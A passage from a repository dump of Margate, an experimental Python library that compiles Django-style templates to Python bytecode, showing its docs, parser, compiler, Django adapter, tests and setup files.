autoclass:: Compiler\n   :members:\n\n.. autoclass:: TemplateLocator\n\nCode generation\n---------------\n\n.. automodule:: margate.code_generation\n\n.. autoclass:: Sequence\n   :members:\n\n.. autoclass:: ForBlock\n   :members:\n\n.. autoclass:: IfBlock\n   :members:\n\n.. autoclass:: ExtendsBlock\n   :members:\n\n.. autoclass:: ReplaceableBlock\n   :members:\n\n.. autoclass:: VariableExpansion\n   :members:\n\n.. autoclass:: Literal\n   :members:\n\n.. autoclass:: Execution\n   :members:\n\nBlock parser\n------------\n\n.. automodule:: margate.block_parser\n\n.. autoclass:: LiteralState\n   :members:\n\n.. autoclass:: ExecutionState\n   :members:\n\n.. autoclass:: ExpressionState\n   :members:\n\nParser\n------\n\n.. automodule:: margate.parser\n\n.. autoclass:: Parser\n   :members:\n\n.. autofunction:: parse_expression\n" }, { "alpha_fraction": 0.6170306205749512, "alphanum_fraction": 0.6176168918609619, "avg_line_length": 33.81122589111328, "blob_id": "fdd8ddc80d7284b4fe2329a6a76f2e57c89999d7", "content_id": "5f7c4edf66eefe0ce09fc1e4e4f40bd70f639cd5", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6823, "license_type": "permissive", "max_line_length": 74, "num_lines": 196, "path": "/margate/parser.py", "repo_name": "timmartin/stencil", "src_encoding": "UTF-8", "text": "\"\"\"The parser converts the template language into a usable structured\nform.\n\nThere are two layers to the parsing: breaking the template down into\nblocks (which is done by the :py:mod:`~margate.block_parser` module),\nand parsing the expressions that appear in the execution blocks within\nthe template.\n\nThe parser in this module uses a combination of ad hoc parsing,\n`funcparserlib <https://pypi.python.org/pypi/funcparserlib>`_ and\n`ast.parse\n<https://docs.python.org/3/library/ast.html#ast.parse>`_. The\ntop-level rules in the language (``if``, ``for``, ``endif`` etc.) are\nhandled ad hoc since they are not recursive. However, the expression\nthat is given as an argument to ``if`` is an arbitrary expression and\nis parsed with ``ast.parse``.\n\n\"\"\"\n\nimport re\nimport ast\nfrom collections import namedtuple\nimport funcparserlib.parser\n\nfrom . import code_generation, compiler\n\nIfNode = namedtuple('IfNode', ['expression'])\nForNode = namedtuple('ForNode', ['variable', 'collection'])\nExtendsNode = namedtuple('ExtendsNode', ['template_name'])\nBlockNode = namedtuple('BlockNode', ['block_name'])\n\n\nclass UnsupportedElementException(Exception):\n    pass\n\n\ndef parse_expression(expression):\n    \"\"\"Parse an expression that appears in an execution node, i.e. a\n    block delimited by ``{% %}``.\n\n    This can be a compound expression like a ``for`` statement with\n    several sub-expressions, or it can just be a single statement such\n    as ``endif``.\n\n    :param list expression: Tokenised expression.\n\n    \"\"\"\n    from funcparserlib.parser import a, skip, some\n\n    # For if expressions, we rely on the Python parser to process the\n    # expression rather than using our own parser.\n    if expression[0] == 'if':\n        return IfNode(ast.parse(' '.join(expression[1:]), mode=\"eval\"))\n\n    variable_name = some(lambda x: re.match(r'[a-zA-Z_]+', x))\n\n    # TODO We use the same function twice, first to match the token\n    # and then to extract the value we care about from the token\n    # (namely the contents of the quoted string). 
This smells wrong.\n def extract_quoted_string(x):\n result = re.match(r'\\\"([^\\\"]*)\\\"', x)\n if result:\n return result.groups(1)\n\n quoted_string = some(extract_quoted_string)\n\n for_expression = (\n skip(a('for'))\n + (variable_name >> str)\n + skip(a('in'))\n + (variable_name >> str))\n\n extends_expression = (\n skip(a('extends'))\n + (quoted_string >> extract_quoted_string))\n\n block_expression = (\n skip(a('block'))\n + (variable_name >> str))\n\n def make_for_node(x): return ForNode(*x)\n\n def make_extends_node(x): return ExtendsNode(*x)\n\n parser = ((for_expression >> make_for_node)\n | (extends_expression >> make_extends_node)\n | (block_expression >> BlockNode))\n\n try:\n return parser.parse(expression)\n except funcparserlib.parser.NoParseError as e:\n raise Exception(\"Invalid expression '%s'\" % expression)\n\n\nclass Parser:\n \"\"\"The Parser is responsible for turning a template in \"tokenised\"\n form into a tree structure from which it is straightforward to\n generate bytecode.\n\n The input is in the form of a flat list of atomic elements of the\n template, where literal text (of any length) is a single element,\n and a ``{% %}`` or ``{{ }}`` expression is a single element.\n\n Figuring out nesting of starting and ending of loops happens\n within the parser.\n\n \"\"\"\n\n def __init__(self, template_locator=None):\n\n def _get_related_template(template_name):\n template = template_locator.find_template(template_name)\n if not template:\n raise FileNotFoundError()\n with open(template) as template_file:\n compiler_obj = compiler.Compiler(template_locator)\n return compiler_obj._get_chunks(template_file.read())\n\n self._sub_template_locator = _get_related_template\n\n def parse(self, tokens):\n \"\"\"Parse a token sequence into a\n :py:class:`~margate.code_generation.Sequence` object.\n\n \"\"\"\n\n sequence = code_generation.Sequence()\n\n self._parse_into_sequence(sequence, tokens)\n\n return sequence\n\n def _parse_into_sequence(self, sequence, tokens,\n termination_condition=None):\n token_iter = iter(tokens)\n\n try:\n while True:\n token = next(token_iter)\n if termination_condition and termination_condition(token):\n return\n\n if isinstance(token, code_generation.Execution):\n # An execution node always starts a subsequence\n # (i.e. a node in the tree with its own\n # children). 
Since we've ruled out the case where\n # this is the termination of an existing block,\n # any Execution node is the start of a new block.\n block = self._parse_subsequence(token, token_iter)\n sequence.add_element(block)\n else:\n sequence.add_element(token)\n except StopIteration:\n return\n\n def _parse_subsequence(self, token, token_iter):\n node = parse_expression(\n re.split(r'\\s+',\n token.expression.strip()))\n\n if isinstance(node, IfNode):\n block = code_generation.IfBlock(node.expression)\n inner_termination_condition = self._end_sequence(\"endif\")\n elif isinstance(node, ForNode):\n block = code_generation.ForBlock(node)\n inner_termination_condition = self._end_sequence(\"endfor\")\n elif isinstance(node, ExtendsNode):\n if self._sub_template_locator is None:\n raise UnsupportedElementException(\n \"Parser is not configured to support \"\n \"extending other templates\")\n\n content = self._sub_template_locator(\n node.template_name)\n parsed = self.parse(content)\n block = code_generation.ExtendsBlock(parsed)\n inner_termination_condition = None\n elif isinstance(node, BlockNode):\n block = code_generation.ReplaceableBlock(\n node.block_name)\n inner_termination_condition = self._end_sequence(\"endblock\")\n else:\n raise Exception(\"Unrecognised block type\")\n\n self._parse_into_sequence(block.sequence,\n token_iter,\n inner_termination_condition)\n\n return block\n\n def _end_sequence(self, end_token):\n def is_end_token(token):\n return (isinstance(token, code_generation.Execution)\n and token.expression == end_token)\n\n return is_end_token\n" }, { "alpha_fraction": 0.6312466859817505, "alphanum_fraction": 0.6317727565765381, "avg_line_length": 27.37313461303711, "blob_id": "113304ec07f36e078e57f196bc962d9c1e7321dd", "content_id": "078b3ddbe9161cac0bacda13e779b43e4207ebcf", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1901, "license_type": "permissive", "max_line_length": 79, "num_lines": 67, "path": "/margate/django/__init__.py", "repo_name": "timmartin/stencil", "src_encoding": "UTF-8", "text": "\"\"\"\nCode for interfacing Margate with Django\n\"\"\"\n\nfrom django.template import TemplateDoesNotExist\nfrom django.template.utils import get_app_template_dirs\nfrom django.template.loaders.filesystem import Loader as DjangoFileSystemLoader\nfrom django.template.backends.base import BaseEngine\n\nfrom margate.compiler import Compiler\n\n\nclass MargateLoader(DjangoFileSystemLoader):\n def get_dirs(self):\n return get_app_template_dirs('margate')\n\n\nclass MargateEngine(BaseEngine):\n app_dirname = \"margate\"\n\n def __init__(self, params):\n params = params.copy()\n\n try:\n params.pop('OPTIONS')\n except KeyError:\n pass\n\n super(MargateEngine, self).__init__(params)\n\n self.loader = MargateLoader(self)\n self.file_charset = 'utf-8'\n self.debug = False\n self.template_libraries = []\n self.template_builtins = []\n self.cache = {}\n\n def get_template(self, template_name):\n if template_name in self.cache:\n return self.cache[template_name]\n else:\n compiler = Compiler()\n template_func = compiler.compile(self.find_template(template_name))\n template = Template(template_func)\n self.cache[template_name] = template\n return template\n\n def find_template(self, name):\n tried = []\n\n for source in self.loader.get_template_sources(name):\n try:\n contents = self.loader.get_contents(source)\n except TemplateDoesNotExist:\n tried.append((source, 'Source does not exist'))\n else:\n return contents\n\n 
raise TemplateDoesNotExist(name, tried=tried)\n\n\nclass Template:\n    def __init__(self, template_func):\n        self.template_func = template_func\n\n    def render(self, context=None, request=None):\n        return self.template_func(**context)\n" }, { "alpha_fraction": 0.7026459574699402, "alphanum_fraction": 0.7039059400558472, "avg_line_length": 28.382715225219727, "blob_id": "8ffc1b8fa74d7b917831a40bf51c392de1a607c9", "content_id": "f4f9ae6f44105859e2ad21a9d82a8ba5a73eebbd", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 2381, "license_type": "permissive", "max_line_length": 70, "num_lines": 81, "path": "/docs/index.rst", "repo_name": "timmartin/stencil", "src_encoding": "UTF-8", "text": "\nWelcome to Margate's documentation!\n===================================\n\n.. toctree::\n   :maxdepth: 2\n   :caption: Contents:\n\n   django\n   todo_list\n   reference\n\nIntroduction\n------------\n\nMargate is a templating engine for Python that compiles templates down\nto Python bytecode. It is mostly Django-compatible in spirit, though\nit falls short of being a drop-in replacement for Django templates.\n\nEarly performance testing suggests that it is around 10 times faster\nthan regular Django templates.\n\nExample\n-------\n\nSimply instantiate a :py:class:`~margate.compiler.Compiler` and call\nits :py:meth:`~margate.compiler.Compiler.compile()` method with the\ntemplate source::\n\n    template_source = \"\"\"\n    <p>Hello {{ person }}, my name is {{ me }}\n    \"\"\"\n\n    compiler = margate.compiler.Compiler()\n    template_function = compiler.compile(template_source)\n\nYou now have a function that can be called to yield the rendered\ncontent. Pass variable values in keyword arguments::\n\n    print(template_function(person=\"alice\",\n                            me=\"a template\"))\n\nFAQ\n---\n\nWhy oh why?\n'''''''''''\n\nMostly to learn about Python bytecode.\n\nYou don't really expect the speed benefit to be worth it, do you?\n'''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''\n\nTemplate rendering is extremely unlikely to be the bottleneck in your\nweb application. Optimising it will at best save a constant overhead\nfrom each page view, and will have a proportionately lower impact on\nyour slowest pages.\n\nOn the other hand, it's free speed. It can probably save you a few\nmilliseconds per page view, which might help when you're trying to get\nyour landing page to load as fast as possible. Assuming the templating\nlanguage has all the same features, why wouldn't you? Template\nexpansion probably can't be parallelised with anything else your web\napp is doing, so milliseconds here contribute directly to the bottom\nline.\n\nWhat's with the name?\n'''''''''''''''''''''\n\nThe library was originally called Stencil, but it turns out that lots\nof people call their templating library Stencil, so I had to change.\n\nI hate spending time thinking of names for projects, so when I get\nstuck I just use the name of an English seaside town. 
There are plenty\nof them and they are reasonably unique and memorable names.\n\nIndices and tables\n==================\n\n* :ref:`genindex`\n* :ref:`modindex`\n* :ref:`search`\n" }, { "alpha_fraction": 0.7725631594657898, "alphanum_fraction": 0.7739169597625732, "avg_line_length": 36.559322357177734, "blob_id": "735f7bda472ae0f1abd6609dc9cd93dda2080c29", "content_id": "98789434acd735205b89016ad67f8a658fc1783b", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 2216, "license_type": "permissive", "max_line_length": 70, "num_lines": 59, "path": "/README.rst", "repo_name": "timmartin/stencil", "src_encoding": "UTF-8", "text": "I originally wrote Margate as an exercise in learning about Python\nbytecode, but I released it in case it was somewhat useful. However,\nafter releasing it I discovered that Jinja2 also includes a bytecode\ngenerator, which probably makes this obsolete for any practical\npurposes. I'm not actively maintaining this project any more.\n\nMargate\n=======\n\nMargate is a library that provides a Django-compatible template engine\nwhere the templates compile to raw Python bytecode. In theory, this\nwill make them expand faster. This is at a very early stage and is\nexperimental.\n\nFeatures\n--------\n\nCurrently Margate supports the following:\n\n* ``for`` loops\n* ``if`` blocks with arbitrary conditions (but not ``else`` blocks)\n* ``extends`` nodes and ``block`` nodes that can be overridden in\n  extending templates\n* Arbitrary nesting of the above (though this isn't well tested yet)\n* Embedding expression values in output\n\nOperation\n---------\n\nThe compiler takes a text template and ultimately outputs an ordinary\nPython function, which you can call (passing context data as the\n`kwargs`) to get rendered text output.\n\nThe first stage is to parse it into a tree structure. In theory this\nmight be able to reuse some parsing code from within Django, but the\nAPI doesn't really seem to be designed to be extended. Instead,\nthere's a small ad hoc parser. First it \"tokenises\", where each\n\"token\" is a chunk of the template (a literal string, a variable\ninclusion or a `{% xyz %}` block). The expressions inside the execution\nblocks also get parsed as a separate operation.\n\nThe resultant parse tree is processed by a code generator that\ngenerates abstract bytecode, using the `Bytecode\n<https://bytecode.readthedocs.io/en/latest/>`_ module to turn this\ninto concrete bytecode that can be processed natively by the Python\nvirtual machine. 
Code generation just expands out some templates with\nhand-generated bytecode.\n\nPerformance tests\n-----------------\n\nI've only done minimal performance tests so far, but on a couple of\nsimple cases Margate is 10 times faster than \"real\" Django\ntemplates.\n\nSee `performance_test.py` for the details.\n\nThis probably means you can shave a few milliseconds off your page\nload time by using Margate.\n" }, { "alpha_fraction": 0.6586452722549438, "alphanum_fraction": 0.6586452722549438, "avg_line_length": 25.069766998291016, "blob_id": "e3ab0f56765bff05ebac3d13dbeff819072f6005", "content_id": "5bd8af2ae3842a2747c4c664030befdd86bb38f4", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 1122, "license_type": "permissive", "max_line_length": 70, "num_lines": 43, "path": "/docs/django.rst", "repo_name": "timmartin/stencil", "src_encoding": "UTF-8", "text": "Using from Django\n=================\n\nLanguage compatibility\n----------------------\n\nThe Margate language is very similar in style to the built-in Django\ntemplate engine, but differs in a number of important details.\n\nMost importantly, ``{{ }}`` expressions (and expressions in ``for``\nloop commands etc.) are treated as arbitrary Python code. This means\nthat they are more flexible than Django template language, but\nprevents you from taking advantage of the shortcuts that automatically\nconvert object attributes into dictionary member lookup.\n\nFor example, instead of writing::\n\n {% for tag in blog_post.tags %}\n ...\n {% endfor %}\n\nif ``blog_post`` is a dictionary, you will need to write::\n\n {% for tag in blog_post[\"tags\"] %}\n ...\n {% endfor %}\n\nAnother limitation is that none of the built-in filters are currently\nsupported.\n\nConfiguring Django to use the engine\n------------------------------------\n\nTo enable Margate in Django, simply add it to the ``TEMPLATES`` in\n``settings.py``::\n\n TEMPLATES = [\n {\n 'BACKEND': 'margate.django.MargateEngine',\n 'DIRS': [],\n 'APP_DIRS': True\n }\n ]\n\n" }, { "alpha_fraction": 0.6261342763900757, "alphanum_fraction": 0.6261342763900757, "avg_line_length": 27.256410598754883, "blob_id": "43f59a97e5040c874866956511659a54c4ffa7aa", "content_id": "68149f41aebcfb7a36ba8f31f72b2ee8569ff549", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1102, "license_type": "permissive", "max_line_length": 70, "num_lines": 39, "path": "/margate/__init__.py", "repo_name": "timmartin/stencil", "src_encoding": "UTF-8", "text": "\"\"\"\nCompiled templates\n\"\"\"\n\nimport os.path\nfrom django.template import TemplateDoesNotExist\nfrom django.template.backends.base import BaseEngine\n\n\nclass Template:\n def __init__(self, code, engine):\n self.code = code\n self.engine = engine\n\n super(Template, self).__init__()\n\n def render(self, context=None, request=None):\n return self.code\n\n\nclass FasterEngine(BaseEngine):\n app_dirname = 'compiled'\n\n def __init__(self, params):\n params.pop('OPTIONS')\n\n super(FasterEngine, self).__init__(params)\n\n def get_template(self, template_name):\n for template_dir in self.template_dirs:\n candidate_file = os.path.join(template_dir, template_name)\n if os.path.exists(candidate_file):\n with open(candidate_file, \"r\") as template_contents:\n return Template(template_contents.read(), self)\n raise TemplateDoesNotExist(\"Template %s does not exist\"\n % template_name)\n\n def from_string(self, template_code):\n 
return Template(template_code, self)\n" }, { "alpha_fraction": 0.8163265585899353, "alphanum_fraction": 0.8163265585899353, "avg_line_length": 23.25, "blob_id": "973549fd176abadd3d8035f46085ec37907585dc", "content_id": "069fb509d54ca998880b491cc0e0e7d695dc38a6", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 98, "license_type": "permissive", "max_line_length": 44, "num_lines": 4, "path": "/tests/__init__.py", "repo_name": "timmartin/stencil", "src_encoding": "UTF-8", "text": "import hy\n\nfrom .hy_parser_test import HyParserTest\nfrom .hy_compiler_test import HyCompilerTest\n\n" }, { "alpha_fraction": 0.5543872117996216, "alphanum_fraction": 0.5554749965667725, "avg_line_length": 29.9887638092041, "blob_id": "33af19cc80fd87f4bfa4c5a2fa7319c49b4d9716", "content_id": "44ceb410fa6376fbd6e635f870c5e56260123984", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2758, "license_type": "permissive", "max_line_length": 73, "num_lines": 89, "path": "/margate/compiler.py", "repo_name": "timmartin/stencil", "src_encoding": "UTF-8", "text": "\"\"\"The compiler module contains the public interface to the library.\n\n\"\"\"\n\nimport re\nimport io\nfrom bytecode import Bytecode, Instr\n\nfrom . import parser, block_parser\n\n\nclass TemplateLocator:\n    \"\"\"The template locator abstracts the details of locating templates\n    when one template extends another (such as with the ``{% extends %}``\n    tag).\n    \"\"\"\n\n    def find_template(self, template_name):\n        pass\n\n\nclass Compiler:\n    \"\"\"The Compiler takes a template in string form and returns bytecode\n    that implements the template.\n    \"\"\"\n\n    def __init__(self, template_locator=None):\n        if template_locator is None:\n            template_locator = TemplateLocator()\n\n        self._template_locator = template_locator\n\n    def compile(self, source):\n        \"\"\"Compile the template source code into a callable function.\n\n        :return: A callable function that returns rendered content as\n            a string when called.\n        \"\"\"\n        bytecode = self._make_bytecode(source, self._template_locator)\n\n        def inner(**local_scope):\n            local_scope[\"_output\"] = io.StringIO()\n            exec(bytecode, {}, local_scope)\n            return local_scope['_output'].getvalue()\n\n        return inner\n\n    def _get_chunks(self, source):\n        state = block_parser.LiteralState(source)\n\n        while state:\n            match = re.search(r\"\\{\\{|\\}\\}|\\{%|%\\}\",\n                              state.text)\n            if match is None:\n                (state, chunk) = state.accept_end_input()\n            else:\n                separator = match.group(0)\n\n                if separator == \"{{\":\n                    action = state.accept_open_expression\n                elif separator == \"}}\":\n                    action = state.accept_close_expression\n                elif separator == \"{%\":\n                    action = state.accept_open_execution\n                elif separator == \"%}\":\n                    action = state.accept_close_execution\n                else:\n                    raise Exception(\"Unrecognised separator\")\n\n                (state, chunk) = action(match.start(0),\n                                        len(match.group(0)))\n\n            yield chunk\n\n    def _make_bytecode(self, source, template_locator):\n        instructions = []\n        symbol_table = {\n            \"write_func\": io.StringIO.write\n        }\n\n        parser_obj = parser.Parser(self._template_locator)\n        sequence = parser_obj.parse(self._get_chunks(source))\n\n        for item in sequence.elements:\n            instructions += item.make_bytecode(symbol_table)\n\n        bytecode = Bytecode(instructions + [Instr(\"LOAD_CONST\", None),\n                                            Instr(\"RETURN_VALUE\")])\n        return bytecode.to_code()\n" }, { "alpha_fraction": 0.29729729890823364, "alphanum_fraction": 0.5945945978164673, 
"avg_line_length": 11.333333015441895, "blob_id": "fc2651f87b34f7d8e4b77e321a132f2ba54fbf47", "content_id": "8704b5d8623035808e2b97896d64aaf44cf1717e", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Text", "length_bytes": 37, "license_type": "permissive", "max_line_length": 13, "num_lines": 3, "path": "/test_requirements.txt", "repo_name": "timmartin/stencil", "src_encoding": "UTF-8", "text": "flake8==3.2.1\nnose==1.3.7\nhy==0.12.1\n" }, { "alpha_fraction": 0.505464494228363, "alphanum_fraction": 0.5245901346206665, "avg_line_length": 27.153846740722656, "blob_id": "59caa16bf196178456587ad25b0837acb9128a9d", "content_id": "20bb011027918ca9481afb1af3250f0c1f884fea", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 366, "license_type": "permissive", "max_line_length": 46, "num_lines": 13, "path": "/setup.py", "repo_name": "timmartin/stencil", "src_encoding": "UTF-8", "text": "from setuptools import setup\n\nsetup(name=\"margate\",\n version='0.0.1',\n description='Faster Django templates',\n author='Tim Martin',\n author_email='[email protected]',\n license='MIT',\n packages=['margate'],\n install_requires=['django',\n 'bytecode>=0.5',\n 'funcparserlib>=0.3'],\n zip_safe=False)\n" }, { "alpha_fraction": 0.5625, "alphanum_fraction": 0.7291666865348816, "avg_line_length": 15, "blob_id": "9e8018f8693120d275e26154537591b79eacfed0", "content_id": "b56b16ce3632f02bb6d38f15fbb7ee7000c502a6", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Text", "length_bytes": 48, "license_type": "permissive", "max_line_length": 20, "num_lines": 3, "path": "/requirements.txt", "repo_name": "timmartin/stencil", "src_encoding": "UTF-8", "text": "django==1.10\nbytecode==0.5\nfuncparserlib==0.3.6\n" }, { "alpha_fraction": 0.5076410174369812, "alphanum_fraction": 0.5112531185150146, "avg_line_length": 35.35353469848633, "blob_id": "032828faae311604bd6889bc3b31df7ebf06de03", "content_id": "bf34f84c96344bd9c6d053704e27804fd3efd411", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3599, "license_type": "permissive", "max_line_length": 78, "num_lines": 99, "path": "/tests/parser_test.py", "repo_name": "timmartin/stencil", "src_encoding": "UTF-8", "text": "import unittest\nimport unittest.mock\nimport ast\nimport io\n\nfrom margate.parser import (Parser, parse_expression, IfNode, ForNode,\n ExtendsNode)\nfrom margate.code_generation import (Literal, Sequence, IfBlock,\n ForBlock, ExtendsBlock, ReplaceableBlock,\n Execution)\n\n\nclass ParserTest(unittest.TestCase):\n def test_simple_sequence(self):\n parser = Parser()\n\n sequence = parser.parse([Literal(\"Foo\"),\n Literal(\"Bar\")])\n\n self.assertEqual(2, len(sequence.elements))\n\n def test_parse_if_block(self):\n parser = Parser()\n\n sequence = parser.parse([Literal(\"Foo\"),\n Execution(\"if True\"),\n Literal(\"Bar\"),\n Execution(\"endif\"),\n Literal(\"Baz\")])\n\n self.assertEqual(sequence.elements[0],\n Literal(\"Foo\"))\n\n self.assertIsInstance(sequence.elements[1],\n IfBlock)\n # TODO There doesn't seem to be an easy way to verify the\n # contents of the AST object.\n self.assertEqual(sequence.elements[1].sequence.elements[0],\n Literal(\"Bar\"))\n\n self.assertEqual(sequence.elements[2],\n Literal(\"Baz\"))\n\n def test_parse_for_loop(self):\n parser = Parser()\n\n sequence = parser.parse([Execution(\"for x in things\"),\n Literal(\"bar\"),\n 
Execution(\"endfor\")])\n\n expected_sequence = Sequence()\n block = ForBlock(ForNode('x', 'things'))\n block.sequence.add_element(Literal(\"bar\"))\n expected_sequence.add_element(block)\n\n self.assertEqual(sequence.elements,\n expected_sequence.elements)\n\n def test_parse_nested(self):\n parser = Parser()\n\n sequence = parser.parse([Execution(\"for x in things\"),\n Execution(\"if x % 2\"),\n Execution(\"endif\"),\n Execution(\"endfor\")])\n\n self.assertEqual(1,\n len(sequence.elements))\n self.assertIsInstance(sequence.elements[0],\n ForBlock)\n\n self.assertIsInstance(sequence.elements[0].sequence.elements[0],\n IfBlock)\n self.assertEqual(1,\n len(sequence.elements[0].sequence.elements))\n\n def test_expression_parser(self):\n \"\"\"Test the expression parser used within the {% %} node\"\"\"\n\n node = parse_expression([\"if\", \"True\"])\n self.assertIsInstance(node, IfNode)\n self.assertEqual(node.expression.body.value,\n True)\n\n node = parse_expression([\"for\", \"var\", \"in\", \"collection\"])\n self.assertIsInstance(node, ForNode)\n self.assertEqual(node, ForNode(\"var\", \"collection\"))\n\n node = parse_expression([\"if\", \"x\", \"<\", \"y\"])\n self.assertIsInstance(node, IfNode)\n self.assertEqual(ast.dump(node.expression),\n \"Expression(body=Compare(\"\n \"left=Name(id='x', ctx=Load()), ops=[Lt()],\"\n \" comparators=[Name(id='y', ctx=Load())]))\")\n\n node = parse_expression([\"extends\", '\"other.html\"'])\n self.assertIsInstance(node, ExtendsNode)\n self.assertEqual(node.template_name,\n \"other.html\")\n" }, { "alpha_fraction": 0.6567550301551819, "alphanum_fraction": 0.6742081642150879, "avg_line_length": 22.799999237060547, "blob_id": "5c8a346386634c9304a2eb8002344272499b2e90", "content_id": "ee8469aa57f81c7650bcfdcfb77b8a36c94e6dfc", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1547, "license_type": "permissive", "max_line_length": 71, "num_lines": 65, "path": "/performance_test.py", "repo_name": "timmartin/stencil", "src_encoding": "UTF-8", "text": "\"\"\"Run the same template through Django templates and through\nmargate, to give a crude performance comparison.\n\n\"\"\"\n\nimport timeit\n\nfrom django.template import Context, Engine\n\nfrom margate.compiler import Compiler\n\nexpression = \"\"\"\nHello {{ name }}, I am a {{ whom }}\n\nI'm going to count:\n{% for i in numbers %}\nnext: {{ i }}\n{% endfor %}\n\"\"\"\n\n# Give some variables to print. 
Note that we have to convert the\n# numbers to string ahead of time, because Django wants to do\n# l10n-specific stuff with numbers and barfs if you attempt to display\n# a number without having settings set up.\nvariables = {\n 'name': 'world',\n 'whom': 'template',\n 'numbers': [str(i) for i in range(200)]\n}\n\ncompiler = Compiler()\nmargate_func = compiler.compile(expression)\n\nengine = Engine()\ntemplate = engine.from_string(expression)\ncontext = Context(variables)\n\n\ndef margate_render():\n return margate_func(**variables)\n\n\ndef django_render():\n return template.render(context)\n\n\ndef do_performance_test():\n assert margate_render() == django_render()\n\n iterations = 1000\n\n time_for_django = timeit.timeit(django_render, number=iterations)\n\n time_for_margate = timeit.timeit(margate_render, number=iterations)\n\n print(\"Django took {time} microseconds\".format(\n time=round(time_for_django / iterations * 1000 * 1000,\n 2)))\n print(\"Margate took {time} microseconds\".format(\n time=round(time_for_margate / iterations * 1000 * 1000,\n 2)))\n\n\nif __name__ == '__main__':\n do_performance_test()\n" }, { "alpha_fraction": 0.5516695380210876, "alphanum_fraction": 0.5520654320716858, "avg_line_length": 28.83070945739746, "blob_id": "72047c080f8cb1f2e08bf8c9610f6d29566ba7a5", "content_id": "1b736dcbcd44540c9cadb9b0ee6c06a64ab51f57", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 7577, "license_type": "permissive", "max_line_length": 74, "num_lines": 254, "path": "/margate/code_generation.py", "repo_name": "timmartin/stencil", "src_encoding": "UTF-8", "text": "\"\"\"This module contains the building blocks of the final template\nfunction, in the form of bytecode generators.\n\nThere are a series of classes in here that are used as nodes in the\ncode generation tree, and each one implements a ``make_bytecode()``\nmethod.\n\n\"\"\"\n\nfrom bytecode import Instr, Label, ConcreteBytecode\n\n\nclass Sequence:\n \"\"\"A sequence of nodes that occur in a parse tree. 
Elements in the\n    sequence can themselves be sequences (thus forming a tree).\n    \"\"\"\n\n    def __init__(self):\n        self.elements = []\n\n    def __eq__(self, other):\n        if not isinstance(other, Sequence):\n            return False\n\n        return self.elements == other.elements\n\n    def __repr__(self):\n        return \"<Sequence %r>\" % self.elements\n\n    def add_element(self, element):\n        self.elements.append(element)\n\n\nclass ForBlock:\n    def __init__(self, for_node):\n        self.variable = for_node.variable\n        self.collection = for_node.collection\n        self.sequence = Sequence()\n\n    def __eq__(self, other):\n        if not isinstance(other, ForBlock):\n            return False\n\n        return (self.variable == other.variable) \\\n            and (self.collection == other.collection) \\\n            and (self.sequence == other.sequence)\n\n    def __repr__(self):\n        return \"<ForBlock %r in %r (%r)>\" % (self.variable,\n                                             self.collection,\n                                             self.sequence)\n\n    def make_bytecode(self, symbol_table):\n        catch_block = Label()\n        start_loop = Label()\n        end_loop = Label()\n        end_for = Label()\n        end_of_function = Label()\n\n        inner = [Instr(\"SETUP_EXCEPT\", catch_block),\n                 Instr(\"SETUP_LOOP\", end_for),\n                 Instr(\"LOAD_NAME\", self.collection),\n                 Instr(\"GET_ITER\"),\n                 start_loop,\n                 Instr(\"FOR_ITER\", end_loop),\n                 Instr(\"STORE_NAME\", self.variable)]\n\n        for element in self.sequence.elements:\n            inner += element.make_bytecode(symbol_table)\n\n        inner += [Instr(\"JUMP_ABSOLUTE\", start_loop),\n                  end_loop,\n                  Instr(\"POP_BLOCK\"),\n                  end_for,\n                  Instr(\"POP_BLOCK\"),\n                  Instr(\"JUMP_FORWARD\", end_of_function)]\n\n        inner += [catch_block,\n                  # In the catch block, we catch everything\n                  # unconditionally (this is wrong, we should filter\n                  # out just StopIteration, which is the only thing we\n                  # have any business catching here).\n                  #\n                  # We pop (I think?) the exception and the stack\n                  # frame data.\n                  Instr(\"POP_TOP\"),\n                  Instr(\"POP_TOP\"),\n                  Instr(\"POP_TOP\"),\n\n                  # Pop the exception frame from the block stack.\n                  Instr(\"POP_EXCEPT\"),\n                  Instr(\"JUMP_FORWARD\", end_of_function),\n                  Instr(\"END_FINALLY\"),\n                  end_of_function]\n\n        return inner\n\n\nclass IfBlock:\n    \"\"\"The IfBlock generates code for a conditional expression.\n\n    This currently only includes literal `True` and `False` as\n    expressions, and doesn't support an `else` branch.\n    \"\"\"\n\n    def __init__(self, condition):\n        self.condition = condition\n        self.sequence = Sequence()\n\n    def __eq__(self, other):\n        if not isinstance(other, IfBlock):\n            return False\n\n        return (self.sequence == other.sequence) \\\n            and (self.condition == other.condition)\n\n    def __repr__(self):\n        return \"<IfBlock %r, %r>\" % (self.condition, self.sequence)\n\n    def make_bytecode(self, symbol_table):\n        label_end = Label()\n\n        compiled_expr = compile(self.condition,\n                                filename=\"<none>\",\n                                mode=\"eval\")\n        concrete_bytecode = ConcreteBytecode.from_code(compiled_expr)\n        inner = concrete_bytecode.to_bytecode()\n\n        # The compiler drops a return statement at the end of the\n        # expression, which we want to strip off so that we can use\n        # the result\n        inner.pop()\n\n        inner += [Instr(\"POP_JUMP_IF_FALSE\", label_end)]\n\n        for element in self.sequence.elements:\n            inner += element.make_bytecode(symbol_table)\n\n        inner += [label_end]\n\n        return inner\n\n\nclass ExtendsBlock:\n    def __init__(self, template):\n        self.template = template\n        self.sequence = Sequence()\n\n    def make_bytecode(self, symbol_table):\n        inner = []\n\n        block_dict = {}\n        for entry in 